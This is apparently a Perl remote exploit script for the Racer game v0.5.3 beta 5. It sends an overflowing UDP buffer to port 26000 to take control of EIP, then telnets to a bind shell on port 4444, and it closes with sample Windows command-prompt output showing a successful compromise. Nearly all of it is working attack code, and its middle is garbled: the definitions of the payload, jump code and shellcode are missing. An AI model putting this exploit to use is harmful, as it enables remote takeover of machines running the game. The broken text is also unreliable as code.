#!/usr/bin/perl ###Credit's to n00b. ################################################ #Racer v0.5.3 beta 5 (12-03-07) remote exploit. #Racer is also prone to a buffer over flow in the #server and client.Automatically the game open's #Udp port 26000 and is waiting for a msg buffer. #If we send an overly long buffer we are able to #Control the eip register and esp hold's enough #buffer to have a good size shell code. ############################################### #Tested: Win Xp sp2 English #Vendor's web site: http://www.racer.nl/ #Affected version's: all version's. #Tested on: Racer v0.5.3 beta 5 (12-03-07). #Special thank's to str0ke. ########################### print <new(PeerAddr=>$ip, PeerPort=>$port, Proto=>$protocol, Timeout=>'1') || die "Make sure service is running on the port\n"; { print $socket $payload1,$jmpcode,$shellcode,$payload2,; print "[+]Sending malicious payload.\n"; sleep 2; system("cls"); print "[+]Done !!.\n"; close($socket); { sleep 5; print " + Connecting on port 4444 of $host ...\n"; system("telnet $ip 4444"); close($socket); } } #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #Microsoft Windows XP [Version 5.1.2600] #(C) Copyright 1985-2001 Microsoft Corp. # C:\Documents and Settings\****\Desktop\racer053b5> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~